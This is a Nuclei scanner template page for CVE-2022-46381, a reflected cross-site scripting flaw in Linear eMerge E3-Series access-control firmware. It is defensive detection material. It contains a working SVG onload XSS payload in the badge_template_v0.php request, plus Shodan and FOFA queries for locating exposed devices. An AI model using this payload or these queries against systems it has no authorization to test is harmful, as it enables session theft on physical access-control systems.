Skip to content
Nuclei Templates

Linear eMerge E3-Series - Cross-Site Scripting

ID: CVE-2022-46381

Severity: medium

Author: arafatansari

Tags: cve,cve2022,xss,emerge,linear,niceforyou

Description

Section titled “Description”

Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.

YAML Source

Section titled “YAML Source”
id: CVE-2022-46381


info:
  name: Linear eMerge E3-Series - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patch or update provided by the vendor to fix the XSS vulnerability in the Linear eMerge E3-Series.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46381
    - https://github.com/omarhashem123/Security-Research/blob/main/CVE-2022-46381/CVE-2022-46381.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46381
    - https://github.com/amitlttwo/CVE-2022-46381
    - https://github.com/k0mi-tg/CVE-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-46381
    cwe-id: CWE-79
    epss-score: 0.00099
    epss-percentile: 0.39871
    cpe: cpe:2.3:o:niceforyou:linear_emerge_e3_access_control_firmware:0.32-07e:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: niceforyou
    product: linear_emerge_e3_access_control_firmware
    shodan-query:
      - http.html:"Linear eMerge"
      - http.html:"linear emerge"
    fofa-query: body="linear emerge"
  tags: cve,cve2022,xss,emerge,linear,niceforyou


http:
  - method: GET
    path:
      - '{{BaseURL}}/badging/badge_template_v0.php?layout=1&type="/><svg/onload="alert(document.domain)"/>'


    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<svg/onload="alert(document.domain)"/>'
          - 'Badging Template'
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a00473045022027d59a46da66ed1c11e264f0ecab3ded37176f108d3c907637fd4497476c92ba022100d9e8d4feb3c72ce783768cd49fff20e52338aeb10acc1005cff1c029f2461040:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-46381.yaml"

View on Github